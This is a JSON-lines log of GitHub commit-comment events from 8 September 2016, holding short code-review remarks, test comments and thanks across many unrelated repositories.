{"id":"4532583766","type":"CommitCommentEvent","actor":{"login":"jklzrj168"},"repo":{"name":"jklzrj168/mystudy"},"payload":{"comment":{"id":18941355,"position":null,"line":null,"path":null,"commit_id":"1b7242870d8a414009213bf59f2a757574c4ddfd","created_at":"2016-09-08T08:37:58Z","updated_at":"2016-09-08T08:37:58Z","body":"远程服务器提交"}},"created_at":"2016-09-08T08:37:58Z"}
{"id":"4532586097","type":"CommitCommentEvent","actor":{"login":"gurkanyarar"},"repo":{"name":"oguzhanbaser/ethernet"},"payload":{"comment":{"id":18941365,"position":null,"line":null,"path":null,"commit_id":"483079634d91d028cf1d75c98d4ffbc0094f3305","created_at":"2016-09-08T08:38:25Z","updated_at":"2016-09-08T08:38:25Z","body":"tanışabiliriz 💃 "}},"created_at":"2016-09-08T08:38:25Z"}
{"id":"4532586461","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18941366,"position":null,"line":null,"path":null,"commit_id":"8735f9f3f90df4121900307976c66b2f4e042427","created_at":"2016-09-08T08:38:30Z","updated_at":"2016-09-08T08:38:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZVK7lrBHT7mGSRD2dGIz4Q"}},"created_at":"2016-09-08T08:38:30Z"}
{"id":"4532598728","type":"CommitCommentEvent","actor":{"login":"davidudoh"},"repo":{"name":"davidudoh/caderp"},"payload":{"comment":{"id":18941385,"position":null,"line":null,"path":null,"commit_id":"ba09266d4ae80445cf4f5d96da81ee7117691c03","created_at":"2016-09-08T08:41:01Z","updated_at":"2016-09-08T08:41:01Z","body":"My test commit"}},"created_at":"2016-09-08T08:41:01Z"}
{"id":"4532599098","type":"CommitCommentEvent","actor":{"login":"davidudoh"},"repo":{"name":"davidudoh/caderp"},"payload":{"comment":{"id":18941387,"position":null,"line":null,"path":null,"commit_id":"ba09266d4ae80445cf4f5d96da81ee7117691c03","created_at":"2016-09-08T08:41:06Z","updated_at":"2016-09-08T08:41:06Z","body":"My test commit"}},"created_at":"2016-09-08T08:41:06Z"}
{"id":"4532599242","type":"CommitCommentEvent","actor":{"login":"davidudoh"},"repo":{"name":"davidudoh/caderp"},"payload":{"comment":{"id":18941388,"position":null,"line":null,"path":null,"commit_id":"ba09266d4ae80445cf4f5d96da81ee7117691c03","created_at":"2016-09-08T08:41:09Z","updated_at":"2016-09-08T08:41:09Z","body":"My test commit"}},"created_at":"2016-09-08T08:41:09Z"}
{"id":"4532599305","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18941391,"position":167,"line":140,"path":"js/hangman.js","commit_id":"ba0a7635dbc1e407d85a307dd3f6548c4cdafb43","created_at":"2016-09-08T08:41:10Z","updated_at":"2016-09-08T08:41:10Z","body":"Hmm"}},"created_at":"2016-09-08T08:41:10Z"}
{"id":"4532607660","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18941424,"position":18,"line":16,"path":"js/hangman.js","commit_id":"acb4c85374bbfef470e75349b01ca781aa90674c","created_at":"2016-09-08T08:42:47Z","updated_at":"2016-09-08T08:42:47Z","body":"Dodawaj sobie w takich miejscach komentarz TODO lub FIXME aby nie zapomnieć by to poprawić."}},"created_at":"2016-09-08T08:42:47Z"}
{"id":"4532612363","type":"CommitCommentEvent","actor":{"login":"ldy00123"},"repo":{"name":"ldy00123/ldy00123.github.io"},"payload":{"comment":{"id":18941443,"position":5,"line":9,"path":"html/index.html","commit_id":"66589da57f53678f335cf111c2e4da085d658905","created_at":"2016-09-08T08:43:42Z","updated_at":"2016-09-08T08:43:42Z","body":"<div>123</div>"}},"created_at":"2016-09-08T08:43:42Z"}
{"id":"4532614439","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18941448,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T08:44:08Z","updated_at":"2016-09-08T08:44:08Z","body":"It incorporates a Func, which is not part of .NET 2.0."}},"created_at":"2016-09-08T08:44:08Z"}
{"id":"4532616448","type":"CommitCommentEvent","actor":{"login":"OXVyeah"},"repo":{"name":"OXVyeah/yayade"},"payload":{"comment":{"id":18941453,"position":null,"line":null,"path":null,"commit_id":"bffc2aca3253be269a3a5412334e55a5abe9f3d8","created_at":"2016-09-08T08:44:30Z","updated_at":"2016-09-08T08:44:30Z","body":"返回"}},"created_at":"2016-09-08T08:44:30Z"}
{"id":"4532619805","type":"CommitCommentEvent","actor":{"login":"duaraghav8"},"repo":{"name":"duaraghav8/solparse"},"payload":{"comment":{"id":18941460,"position":null,"line":null,"path":null,"commit_id":"df210f8ace364fa4b02ca5d9a9a2180534147727","created_at":"2016-09-08T08:45:10Z","updated_at":"2016-09-08T08:45:10Z","body":"Fixes https://github.com/duaraghav8/Solium/issues/31"}},"created_at":"2016-09-08T08:45:10Z"}
{"id":"4532621230","type":"CommitCommentEvent","actor":{"login":"siaw23"},"repo":{"name":"siaw23/ticket_tracker"},"payload":{"comment":{"id":18941461,"position":null,"line":null,"path":null,"commit_id":"85dab57112817d01d3dc8268ca3fc6ed79f80039","created_at":"2016-09-08T08:45:24Z","updated_at":"2016-09-08T08:45:24Z","body":"Some tests run in Chrome alright after this change. But other tests open with Firefox! 😳"}},"created_at":"2016-09-08T08:45:24Z"}
{"id":"4532622877","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"sheerun/knex-migrate"},"payload":{"comment":{"id":18941465,"position":null,"line":null,"path":null,"commit_id":"d2b82d31fdbe2f2435eb132646113d354fb91388","created_at":"2016-09-08T08:45:42Z","updated_at":"2016-09-08T08:45:42Z","body":"👍 thanks\r\n\r\nYou can add me as contributor if you like. But I'll still use the other framework.\r\nI want to have the history."}},"created_at":"2016-09-08T08:45:42Z"}
{"id":"4532624282","type":"CommitCommentEvent","actor":{"login":"ligudo"},"repo":{"name":"ligudo/Hello-World"},"payload":{"comment":{"id":18941470,"position":1,"line":1,"path":"README.md","commit_id":"0696ddf0279bf8b3f96ea0c4fc0961aec215c0e4","created_at":"2016-09-08T08:46:00Z","updated_at":"2016-09-08T08:46:00Z","body":"shijishangmeishenmehaojiangde"}},"created_at":"2016-09-08T08:46:00Z"}
{"id":"4532625787","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18941473,"position":2,"line":1,"path":"js/hangman.js","commit_id":"a2ee1a403afe5062cdd73222e5f7eb5f47b85f94","created_at":"2016-09-08T08:46:16Z","updated_at":"2016-09-08T08:46:16Z","body":"Jak reformatujesz kod to commituj zmiany oddzielnie, bo teraz nie widać w diffie gdzie coś zmieniałeś, a gdzie tylko poprawiłeś formatowanie. "}},"created_at":"2016-09-08T08:46:16Z"}
{"id":"4532627299","type":"CommitCommentEvent","actor":{"login":"erfanoabdi"},"repo":{"name":"YustasSwamp/iDroid-kernel"},"payload":{"comment":{"id":18941475,"position":null,"line":null,"path":null,"commit_id":"81e573aad9fa7b3f56bf6efc31e4ed65d131711c","created_at":"2016-09-08T08:46:31Z","updated_at":"2016-09-08T08:46:31Z","body":"ECC checking is OK \r\nuse this patch : https://github.com/erfanoabdi/iDroid-kernel/commit/793ec712288d81102472185a363f292ce8c1e764"}},"created_at":"2016-09-08T08:46:31Z"}
{"id":"4532631653","type":"CommitCommentEvent","actor":{"login":"birama"},"repo":{"name":"fellague/ConsultationManager"},"payload":{"comment":{"id":18941489,"position":null,"line":null,"path":null,"commit_id":"af3ee95226dccf798699f3ab91ad772ab0f54f08","created_at":"2016-09-08T08:47:23Z","updated_at":"2016-09-08T08:47:23Z","body":"I'm watching what you do you can contact me if you need help"}},"created_at":"2016-09-08T08:47:23Z"}
{"id":"4532631914","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"sheerun/knex-migrate"},"payload":{"comment":{"id":18941490,"position":null,"line":null,"path":null,"commit_id":"d2b82d31fdbe2f2435eb132646113d354fb91388","created_at":"2016-09-08T08:47:26Z","updated_at":"2016-09-08T08:47:26Z","body":"Btw, what was the reason that you created this module? Couldn't just just have used a custom storage? Instead of copying all the cli stuff?"}},"created_at":"2016-09-08T08:47:26Z"}
{"id":"4532632287","type":"CommitCommentEvent","actor":{"login":"Allando"},"repo":{"name":"Allando/Trail1"},"payload":{"comment":{"id":18941491,"position":null,"line":null,"path":null,"commit_id":"c1843235ed8f680abb59ad54dea04f506e958f0c","created_at":"2016-09-08T08:47:30Z","updated_at":"2016-09-08T08:47:30Z","body":"tl;dr"}},"created_at":"2016-09-08T08:47:30Z"}
{"id":"4532632328","type":"CommitCommentEvent","actor":{"login":"yweng8111"},"repo":{"name":"yweng8111/hr"},"payload":{"comment":{"id":18941493,"position":null,"line":null,"path":null,"commit_id":"6d5ccee0c64b544c97bfea44c4716f3100d888b4","created_at":"2016-09-08T08:47:31Z","updated_at":"2016-09-08T08:47:31Z","body":"Why did you remove this module?"}},"created_at":"2016-09-08T08:47:31Z"}
{"id":"4532633572","type":"CommitCommentEvent","actor":{"login":"Easter1021"},"repo":{"name":"codecasts/nusoap-php7"},"payload":{"comment":{"id":18941495,"position":null,"line":null,"path":null,"commit_id":"1e41fdb4e5792337f65f7bd24ea11367bdcb3224","created_at":"2016-09-08T08:47:47Z","updated_at":"2016-09-08T08:47:47Z","body":"thanks you\r\n"}},"created_at":"2016-09-08T08:47:47Z"}
{"id":"4532637100","type":"CommitCommentEvent","actor":{"login":"zhangnaifan"},"repo":{"name":"zhangnaifan/HelloWorld"},"payload":{"comment":{"id":18941500,"position":null,"line":null,"path":null,"commit_id":"f8e937b010712b2e367431ffbcbc41e5ef6eb7ac","created_at":"2016-09-08T08:48:29Z","updated_at":"2016-09-08T08:48:29Z","body":"good change!"}},"created_at":"2016-09-08T08:48:29Z"}
{"id":"4532637825","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18941503,"position":35,"line":20,"path":"js/hangman.js","commit_id":"a2ee1a403afe5062cdd73222e5f7eb5f47b85f94","created_at":"2016-09-08T08:48:37Z","updated_at":"2016-09-08T08:48:37Z","body":"randomWord() wywołujesz dwa razy: tutaj..."}},"created_at":"2016-09-08T08:48:37Z"}
{"id":"4532638178","type":"CommitCommentEvent","actor":{"login":"rikyuusima"},"repo":{"name":"TNCT-SYSKEN/Neurnect"},"payload":{"comment":{"id":18941505,"position":5,"line":10,"path":"Neurnect-server/DB_method/posted_data.js","commit_id":"94ddf4f1e5c79b36e43e96834971ca9a63466e5f","created_at":"2016-09-08T08:48:41Z","updated_at":"2016-09-08T08:48:41Z","body":"Receじゃなくてreceのほうが良いかも…"}},"created_at":"2016-09-08T08:48:41Z"}
{"id":"4532638840","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18941507,"position":258,"line":152,"path":"js/hangman.js","commit_id":"a2ee1a403afe5062cdd73222e5f7eb5f47b85f94","created_at":"2016-09-08T08:48:49Z","updated_at":"2016-09-08T08:48:49Z","body":"randomWord() wywołujesz dwa razy: ...i tutaj."}},"created_at":"2016-09-08T08:48:49Z"}
{"id":"4532642926","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":18941510,"position":295,"line":239,"path":".travis.yml","commit_id":"c9b611568e1946f020d3a5bad7c719672616f32a","created_at":"2016-09-08T08:49:37Z","updated_at":"2016-09-08T08:49:37Z","body":"@drdanz should this be `-DCREATE_SHARED_LIBRARY=OFF` ?"}},"created_at":"2016-09-08T08:49:37Z"}
{"id":"4532644075","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18941511,"position":1,"line":1,"path":"dump.rdb","commit_id":"4afca80e5f9df2a18604852239ef28f6defee18b","created_at":"2016-09-08T08:49:50Z","updated_at":"2016-09-08T08:49:50Z","body":"you probably didn't mean to commit this?"}},"created_at":"2016-09-08T08:49:50Z"}
{"id":"4532648231","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18941520,"position":null,"line":null,"path":null,"commit_id":"4ee7b921de8f0cf71a092457dc8ded39d91c7c2e","created_at":"2016-09-08T08:50:41Z","updated_at":"2016-09-08T08:50:41Z","body":"one think more : \r\n\r\n1. when click no : you must reactivate other button : https://github.com/LimeSurvey/LimeSurvey/blob/master/scripts/survey_runtime.js#L84\r\n2. I don't think the action for yes is OK actually ? If don't use the link at top.\r\n"}},"created_at":"2016-09-08T08:50:41Z"}
{"id":"4532650897","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":18941527,"position":null,"line":null,"path":null,"commit_id":"8a55445ec342bda3fbdf18495d7ae0d640d03bb4","created_at":"2016-09-08T08:51:13Z","updated_at":"2016-09-08T08:51:13Z","body":"I also grouped all the \"flicker\" related properties under a `_flicker` objects, that reduces the amounts of properties for me.Sprite (kind of compensate for the added one after the merge)"}},"created_at":"2016-09-08T08:51:13Z"}
{"id":"4532652227","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18941530,"position":null,"line":null,"path":null,"commit_id":"19e757af5cb6bbde3f9263f0f4aaec87a7e0301c","created_at":"2016-09-08T08:51:27Z","updated_at":"2016-09-08T08:51:27Z","body":"which spells did this commit fix ?"}},"created_at":"2016-09-08T08:51:27Z"}
{"id":"4532653522","type":"CommitCommentEvent","actor":{"login":"bmack"},"repo":{"name":"b13/t3ext-seo_basics"},"payload":{"comment":{"id":18941533,"position":null,"line":null,"path":null,"commit_id":"0b9dad35aaeb22d32ae0e5f95b9bf7d332489f4f","created_at":"2016-09-08T08:51:44Z","updated_at":"2016-09-08T08:51:44Z","body":"I'd prefer using array_replace_recursive() instead."}},"created_at":"2016-09-08T08:51:44Z"}
{"id":"4532654033","type":"CommitCommentEvent","actor":{"login":"Dragonjcgc"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":18941535,"position":null,"line":null,"path":null,"commit_id":"b531cf27d09c43dcdf2eaee05a659166beaee1b6","created_at":"2016-09-08T08:51:50Z","updated_at":"2016-09-08T08:51:50Z","body":"Pour Tree, le tutoriel est un peu compliqué, car ils utilisent le plugin migrations (il y a moyen de faire sans de façon plus simple) :\r\nhttp://book.cakephp.org/3.0/fr/tutorials-and-examples/blog/part-three.html#creer-une-categorie-en-arbre-tree"}},"created_at":"2016-09-08T08:51:50Z"}
{"id":"4532658217","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18941539,"position":62,"line":62,"path":"HarvestMap/Database/HarvestMapDatabase.lua","commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T08:52:42Z","updated_at":"2016-09-08T08:52:42Z","body":"Why do you use such naming for functions? Functions are first-class values, they are not tables/modules."}},"created_at":"2016-09-08T08:52:42Z"}
{"id":"4532659336","type":"CommitCommentEvent","actor":{"login":"mkroon1"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18941540,"position":26,"line":117,"path":"src/class/object_custom_viewlists.php","commit_id":"c4175ac18f6ee9d50887360b81da84a80e47408b","created_at":"2016-09-08T08:52:55Z","updated_at":"2016-09-08T08:52:55Z","body":"I needed to access all custom columns for a particular object type (which is done in the next commit [here](https://github.com/LOVDnl/LOVD3/pull/118/commits/800392199f48d00d847ea2104d1bc358c96e9f3b#diff-efade6f72ff0cd4f48900a2df76650e1R129)) And because I saw a couple of lines in this file like the code below, I thought it would be an improvement.\r\n```PHP\r\nforeach ($this->aColumns['VariantOnGenome'] as $sCol => $aCol) {\r\n       if (substr($sCol, 0, 15) == 'VariantOnGenome') {\r\n```\r\nI checked objects.php, but couldn't find anything that would break down. Also the tests didn't complain as far as I could see. Can you show me where it breaks?"}},"created_at":"2016-09-08T08:52:55Z"}
{"id":"4532659703","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18941541,"position":70,"line":70,"path":"HarvestMap/Database/HarvestMapDatabase.lua","commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T08:52:59Z","updated_at":"2016-09-08T08:52:59Z","body":"Different indentation?"}},"created_at":"2016-09-08T08:52:59Z"}
{"id":"4532662222","type":"CommitCommentEvent","actor":{"login":"sdrees"},"repo":{"name":"KaiKratz/dslink-dart-shell"},"payload":{"comment":{"id":18941550,"position":null,"line":null,"path":null,"commit_id":"b77c84caffc1663e7cc522c31ac16058f8702348","created_at":"2016-09-08T08:53:28Z","updated_at":"2016-09-08T08:53:28Z","body":"In my experience, this is more data then code, and thus I would suggest sorting the list entries lexically. So e.g. instead of `[\"q\", \"quit\", \"exit\", \"end\", \"finish\", \"done\", \"fin\"]` better `[\"done\", \"exit\", \"end\", \"fin\", \"finish\",  \"q\", \"quit\",]` (and also keep semantically realted tokens close ;-)"}},"created_at":"2016-09-08T08:53:28Z"}
{"id":"4532666096","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18941557,"position":16,"line":332,"path":"arch/arm/boot/dts/qcom/msm8956.dtsi","commit_id":"6a85d83174b24f57b022d0c7c674cfc0367ab76d","created_at":"2016-09-08T08:54:12Z","updated_at":"2016-09-08T08:54:12Z","body":"I'm using 1.8048 voltage level for this OC-ed freq and it's pretty stable no random reboots so far when running heavy benchmarking apps over 1 hours endurance test."}},"created_at":"2016-09-08T08:54:12Z"}
{"id":"4532668424","type":"CommitCommentEvent","actor":{"login":"holoLennon"},"repo":{"name":"holoLennon/holo"},"payload":{"comment":{"id":18941566,"position":null,"line":null,"path":null,"commit_id":"02a4933f4b24773c42c84a93155f7921dbb10227","created_at":"2016-09-08T08:54:38Z","updated_at":"2016-09-08T08:54:38Z","body":"haha"}},"created_at":"2016-09-08T08:54:38Z"}
{"id":"4532669790","type":"CommitCommentEvent","actor":{"login":"antoniods311"},"repo":{"name":"antoniods311/projectExample"},"payload":{"comment":{"id":18941568,"position":null,"line":null,"path":null,"commit_id":"7fd1800569920b5324a3d21bb9c43adcf47b22a3","created_at":"2016-09-08T08:54:52Z","updated_at":"2016-09-08T08:54:52Z","body":"This is the first commit."}},"created_at":"2016-09-08T08:54:52Z"}
{"id":"4532670285","type":"CommitCommentEvent","actor":{"login":"KaiKratz"},"repo":{"name":"KaiKratz/dslink-dart-shell"},"payload":{"comment":{"id":18941570,"position":null,"line":null,"path":null,"commit_id":"b77c84caffc1663e7cc522c31ac16058f8702348","created_at":"2016-09-08T08:54:56Z","updated_at":"2016-09-08T08:54:56Z","body":"Will do that.\r\nKai Kratz\r\nSoftware Engineer\r\nData Analytics Group\r\nkkratz@cisco.com\r\nMobile: +49 171 909 28 38\r\n\r\nFrom: Stefan Hagen <notifications@github.com<mailto:notifications@github.com>>\r\nReply-To: KaiKratz/dslink-dart-shell <reply@reply.github.com<mailto:reply@reply.github.com>>\r\nDate: Thursday, September 8, 2016 at 10:53 AM\r\nTo: KaiKratz/dslink-dart-shell <dslink-dart-shell@noreply.github.com<mailto:dslink-dart-shell@noreply.github.com>>\r\nCc: Kai Kratz <kkratz@cisco.com<mailto:kkratz@cisco.com>>, Author <author@noreply.github.com<mailto:author@noreply.github.com>>\r\nSubject: Re: [KaiKratz/dslink-dart-shell] Update existing commands (b77c84c)\r\n\r\n\r\nIn my experience, this is more data then code, and thus I would suggest sorting the list entries lexically. So e.g. instead of [\"q\", \"quit\", \"exit\", \"end\", \"finish\", \"done\", \"fin\"] better [\"done\", \"exit\", \"end\", \"fin\", \"finish\", \"q\", \"quit\",] (and also keep semantically realted tokens close ;-)\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/KaiKratz/dslink-dart-shell/commit/b77c84caffc1663e7cc522c31ac16058f8702348#commitcomment-18941550>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AVB6q0RMQQ9lZx0qjzPDHcA9pC1DYSCTks5qn80IgaJpZM4J3wdH>.\r\n"}},"created_at":"2016-09-08T08:54:56Z"}
{"id":"4532671120","type":"CommitCommentEvent","actor":{"login":"feketemihai"},"repo":{"name":"yweng8111/hr"},"payload":{"comment":{"id":18941571,"position":null,"line":null,"path":null,"commit_id":"6d5ccee0c64b544c97bfea44c4716f3100d888b4","created_at":"2016-09-08T08:55:07Z","updated_at":"2016-09-08T08:55:07Z","body":"@yweng8111 You have the explanation here, https://github.com/OCA/hr/pull/234,  the module was not ported to v8 and v9 yet and the pr's were already done, so the module will be separated to be more easy to understand for most of the users..."}},"created_at":"2016-09-08T08:55:07Z"}
{"id":"4532674189","type":"CommitCommentEvent","actor":{"login":"jgeerds"},"repo":{"name":"sheenobu/nixos"},"payload":{"comment":{"id":18941573,"position":null,"line":null,"path":null,"commit_id":"cbc179b0c100ed876a7cca9d8ad858d5344f4edc","created_at":"2016-09-08T08:55:37Z","updated_at":"2016-09-08T08:55:37Z","body":"Would be nice to have this directly in NixOS :smiley: "}},"created_at":"2016-09-08T08:55:37Z"}
{"id":"4532675942","type":"CommitCommentEvent","actor":{"login":"mullayaasin"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18941579,"position":230,"line":274,"path":"QMChatViewController/QMChatDataSource/QMChatDataSource.m","commit_id":"fb91417cd9f6fe3f55ac55ca7fdbeccb3ffb7435","created_at":"2016-09-08T08:55:55Z","updated_at":"2016-09-08T08:55:55Z","body":"fbb91417"}},"created_at":"2016-09-08T08:55:55Z"}
{"id":"4532677233","type":"CommitCommentEvent","actor":{"login":"mullayaasin"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18941583,"position":230,"line":274,"path":"QMChatViewController/QMChatDataSource/QMChatDataSource.m","commit_id":"fb91417cd9f6fe3f55ac55ca7fdbeccb3ffb7435","created_at":"2016-09-08T08:56:12Z","updated_at":"2016-09-08T08:56:12Z","body":"#88"}},"created_at":"2016-09-08T08:56:12Z"}
{"id":"4532681819","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18941588,"position":26,"line":26,"path":"HarvestMap/Database/HarvestMapDatabase.lua","commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T08:57:01Z","updated_at":"2016-09-08T08:57:01Z","body":"Oh... I see your idea for caching of nodes for different maps, but this implementation is not the best one. In this case everyone must know what cache should be used, but its possible to hide this inside database. and only have check on reconfiguration of database, to reuse previously loaded caches instead of initialization of new one."}},"created_at":"2016-09-08T08:57:01Z"}
{"id":"4532683020","type":"CommitCommentEvent","actor":{"login":"rlebret"},"repo":{"name":"torch/torch7"},"payload":{"comment":{"id":18941594,"position":null,"line":null,"path":null,"commit_id":"df191583ab794dd8e82a101f1d17436902ee5152","created_at":"2016-09-08T08:57:16Z","updated_at":"2016-09-08T08:57:16Z","body":"`lib/TH/generic/THVector.h` is missing in `lib/TH/CMakeLists.txt`.\r\nYou should add it at line 335."}},"created_at":"2016-09-08T08:57:16Z"}
{"id":"4532685642","type":"CommitCommentEvent","actor":{"login":"grunenwald"},"repo":{"name":"HE-Arc/php-intro-framework"},"payload":{"comment":{"id":18941605,"position":2,"line":1,"path":"LICENSE","commit_id":"b1b90ea8e675e0be0948ef1de7953a03bbc93fc5","created_at":"2016-09-08T08:57:45Z","updated_at":"2016-09-08T08:57:45Z","body":"Tu peux virer ISIC, ça n'existe plus..."}},"created_at":"2016-09-08T08:57:45Z"}
{"id":"4532686312","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941606,"position":85,"line":114,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaStaticClassScope.kt","commit_id":"074293f38946e83d19010f3ce08186b119a6c4a4","created_at":"2016-09-08T08:57:52Z","updated_at":"2016-09-08T08:57:52Z","body":"Looks like `asSequence` + `asIterable` is not needed here?"}},"created_at":"2016-09-08T08:57:52Z"}
{"id":"4532687654","type":"CommitCommentEvent","actor":{"login":"mkroon1"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18941609,"position":8,"line":131,"path":"src/changelog.txt","commit_id":"e3546348fc590c88a388957c4cfe3af0e79e4b2e","created_at":"2016-09-08T08:58:09Z","updated_at":"2016-09-08T08:58:09Z","body":"Weird. Somehow this must have been duplicated in another branch. Thanks!"}},"created_at":"2016-09-08T08:58:09Z"}
{"id":"4532688186","type":"CommitCommentEvent","actor":{"login":"rjuchn"},"repo":{"name":"bjagodzinski/DevTest"},"payload":{"comment":{"id":18941612,"position":6,"line":21,"path":"src/main/java/UrlConnector.java","commit_id":"9b5ccaced63acd229490f8ec652c61d85a501846","created_at":"2016-09-08T08:58:14Z","updated_at":"2016-09-08T08:58:14Z","body":"It is primitive, i'm comparing strings."}},"created_at":"2016-09-08T08:58:14Z"}
{"id":"4532693204","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18941641,"position":null,"line":null,"path":null,"commit_id":"f619f7657547a512c412bab0b4f41826568dca4c","created_at":"2016-09-08T08:59:12Z","updated_at":"2016-09-08T08:59:12Z","body":"Collaborator:\nCorresponding review in collaborator has been completed. [Link to review](http://127.0.0.1:8080/ui#review:id=1)\nAuthor: test1 test1\nReviewer: test2 test2"}},"created_at":"2016-09-08T08:59:12Z"}
{"id":"4532694906","type":"CommitCommentEvent","actor":{"login":"bhanushrestha"},"repo":{"name":"eidheim/Simple-Web-Server"},"payload":{"comment":{"id":18941645,"position":null,"line":null,"path":null,"commit_id":"ffac7545cfbd494897775935e26261d8471ae792","created_at":"2016-09-08T08:59:33Z","updated_at":"2016-09-08T08:59:33Z","body":"@eidheim\r\n\r\nJust to clarify on the commit here. So now if i just create a new HttpsClient in a manner such as  \t`HttpsClient client( \"localhost:8080\");`\r\n\r\nThis will by default set verify_certificate as true and then the set the verification path as is default for each OS. Correct?\r\n\r\n"}},"created_at":"2016-09-08T08:59:33Z"}
{"id":"4532699856","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941664,"position":1,"line":1,"path":".idea/libraries/Maven__com_google_guava_guava_16_0_1.xml","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:00:31Z","updated_at":"2016-09-08T09:00:31Z","body":"Normally, we don't commit the libraries in the maven project. The dependency is specified in the pom.xml already. It will auto update once the project open."}},"created_at":"2016-09-08T09:00:31Z"}
{"id":"4532702458","type":"CommitCommentEvent","actor":{"login":"eidheim"},"repo":{"name":"eidheim/Simple-Web-Server"},"payload":{"comment":{"id":18941667,"position":null,"line":null,"path":null,"commit_id":"ffac7545cfbd494897775935e26261d8471ae792","created_at":"2016-09-08T09:00:58Z","updated_at":"2016-09-08T09:00:58Z","body":"Yes, the verify_certificate has true as default value. See line 13. "}},"created_at":"2016-09-08T09:00:58Z"}
{"id":"4532705621","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941670,"position":18,"line":18,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:01:34Z","updated_at":"2016-09-08T09:01:34Z","body":"Class name should be a noun phrase not a verb phrase."}},"created_at":"2016-09-08T09:01:34Z"}
{"id":"4532709878","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941676,"position":27,"line":27,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:02:21Z","updated_at":"2016-09-08T09:02:21Z","body":"The def keyword is redundant for static properties"}},"created_at":"2016-09-08T09:02:21Z"}
{"id":"4532710838","type":"CommitCommentEvent","actor":{"login":"imufun"},"repo":{"name":"imufun/CanyonBunnyMain"},"payload":{"comment":{"id":18941678,"position":null,"line":null,"path":null,"commit_id":"e1c7ada34c50a66db7dd06a9904ef78636898650","created_at":"2016-09-08T09:02:31Z","updated_at":"2016-09-08T09:02:31Z","body":"page- 138"}},"created_at":"2016-09-08T09:02:31Z"}
{"id":"4532714584","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941680,"position":28,"line":28,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:03:15Z","updated_at":"2016-09-08T09:03:15Z","body":"the function names should starts by lower case characters (camel case)"}},"created_at":"2016-09-08T09:03:15Z"}
